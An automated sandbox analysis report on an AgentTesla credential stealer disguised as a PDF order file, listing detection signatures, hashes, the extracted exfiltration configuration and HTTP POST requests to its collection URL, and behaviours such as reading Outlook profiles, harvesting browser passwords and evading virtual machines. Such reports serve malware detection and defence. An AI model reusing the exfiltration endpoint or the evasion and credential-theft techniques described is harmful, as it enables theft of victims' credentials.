Windows Analysis Report #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe

Overview

General Information

Sample Name: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Analysis ID: 528513
MD5: 7fb080a6aa45b1ac87c003e3f84a2983
SHA1: fa4a0744b0b1282e3f3c167773abcd50e806c133
SHA256: a1e613cf9bd9b9afbd51f0c2173cb71ddfdfecdc480b4dc8fc7571a41c90100d
Tags: AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}
Multi AV Scanner detection for domain / URL
Source: mgbless.in Virustotal: Detection: 5% Perma Link
Source: www.mgbless.in Virustotal: Detection: 7% Perma Link
Source: http://www.mgbless.in Virustotal: Detection: 7% Perma Link
Source: https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php Virustotal: Detection: 8% Perma Link
Antivirus or Machine Learning detection for unpacked file
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack Avira: Label: TR/Spy.Gen8
Source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.6.unpack Avira: Label: TR/Spy.Gen8

Compliance:

barindex
Uses 32bit PE files
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown HTTPS traffic detected: 104.223.93.105:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Networking:

barindex
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.223.93.105 104.223.93.105
Source: Joe Sandbox View IP Address: 104.223.93.105 104.223.93.105
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 366Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 362Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 376Expect: 100-continueConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp String found in binary or memory: http://OcJtmX.com
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.917580598.00000000064F8000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916631283.0000000002DDA000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmp String found in binary or memory: http://mgbless.in
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916631283.0000000002DDA000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmp String found in binary or memory: http://www.mgbless.in
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916704934.0000000002DFB000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp String found in binary or memory: https://www.mgbless.in
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmp String found in binary or memory: https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp String found in binary or memory: https://www.mgbless.in/buzo/inc/a9e2f06d4bab2c.php127.0.0.1POST
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916605594.0000000002DBC000.00000004.00000001.sdmp String found in binary or memory: https://www.mgbless.in4Xl
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916874458.0000000002EA6000.00000004.00000001.sdmp String found in binary or memory: https://www.mgbless.in4XlLm
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916730583.0000000002E06000.00000004.00000001.sdmp String found in binary or memory: https://www.mgbless.inD8Xl47
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp, #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000000.658655936.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.916525132.0000000002D11000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown HTTP traffic detected: POST /buzo/inc/a9e2f06d4bab2c.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: www.mgbless.inContent-Length: 366Expect: 100-continueConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: www.mgbless.in
Source: unknown HTTPS traffic detected: 104.223.93.105:443 -> 192.168.2.4:49779 version: TLS 1.2

System Summary:

barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: initial sample Static PE information: Filename: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
.NET source code contains very large array initializations
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b9AE5D3B4u002d2635u002d4821u002d844Au002d98E2A33766C9u007d/CD5F680Cu002dBDE0u002d494Bu002dB19Fu002dD0BFC7469809.cs Large array initialization: .cctor: array initializer size 11847
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b9AE5D3B4u002d2635u002d4821u002d844Au002d98E2A33766C9u007d/CD5F680Cu002dBDE0u002d494Bu002dB19Fu002dD0BFC7469809.cs Large array initialization: .cctor: array initializer size 11847
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007b9AE5D3B4u002d2635u002d4821u002d844Au002d98E2A33766C9u007d/CD5F680Cu002dBDE0u002d494Bu002dB19Fu002dD0BFC7469809.cs Large array initialization: .cctor: array initializer size 11847
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b9AE5D3B4u002d2635u002d4821u002d844Au002d98E2A33766C9u007d/CD5F680Cu002dBDE0u002d494Bu002dB19Fu002dD0BFC7469809.cs Large array initialization: .cctor: array initializer size 11847
Uses 32bit PE files
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Detected potential crypto function
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 0_2_01698250 0_2_01698250
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 0_2_0169D2E8 0_2_0169D2E8
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E13C20 5_2_00E13C20
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E19D18 5_2_00E19D18
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E11270 5_2_00E11270
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E133B8 5_2_00E133B8
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E1AB94 5_2_00E1AB94
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E4B838 5_2_00E4B838
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_00E467C0 5_2_00E467C0
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_011646A0 5_2_011646A0
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_0116465F 5_2_0116465F
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_0116467F 5_2_0116467F
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Code function: 5_2_0116DA00 5_2_0116DA00
Sample file is different than original file name gathered from version info
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Binary or memory string: OriginalFilename vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.663674311.0000000006710000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameInnerException.dll" vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661006568.0000000003161000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameGUdFRhHFLvYFZdmxEdTnFNkQg.exe4 vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameGUdFRhHFLvYFZdmxEdTnFNkQg.exe4 vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000000.00000002.661498626.000000000416D000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Binary or memory string: OriginalFilename vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Binary or memory string: OriginalFilename vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.915352748.0000000000438000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameGUdFRhHFLvYFZdmxEdTnFNkQg.exe4 vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, 00000005.00000002.915560272.0000000000CF8000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Binary or memory string: OriginalFilenameDebugg.exe. vs #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File read: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe:Zone.Identifier Jump to behavior
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe "C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe"
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Process created: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/1@6/2
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\zvjPHYm
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: /Debugg;component/views/addbook.xaml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: views/addcustomer.baml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: views/addbook.baml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: /Debugg;component/views/addcustomer.xaml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: /Debugg;component/views/addbook.xaml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: views/addbook.baml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: views/addcustomer.baml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: /Debugg;component/views/addcustomer.xaml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: /Debugg;component/views/addbook.xaml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: views/addbook.baml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: views/addcustomer.baml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: /Debugg;component/views/addcustomer.xaml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: I/Debugg;component/views/addbook.xaml_/Debugg;component/views/borrowfrombookview.xamlU/Debugg;component/views/borrowingview.xamlO/Debugg;component/views/changebook.xamlW/Debugg;component/views/changecustomer.xamlS/Debugg;component/views/customerview.xamlW/Debugg;component/views/deletecustomer.xamlM/Debugg;component/views/errorview.xamlQ/Debugg;component/views/smallextras.xamlQ/Debugg;component/views/addcustomer.xaml
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.10.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.4.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.400000.8.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: #U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.df0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.df0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 3.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.3e0000.2.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.11.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.2.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.5.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.9.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.7.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.#U56de#U8986 Picture for ORDER AFF21-19810,pdf.exe.8c0000.13.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
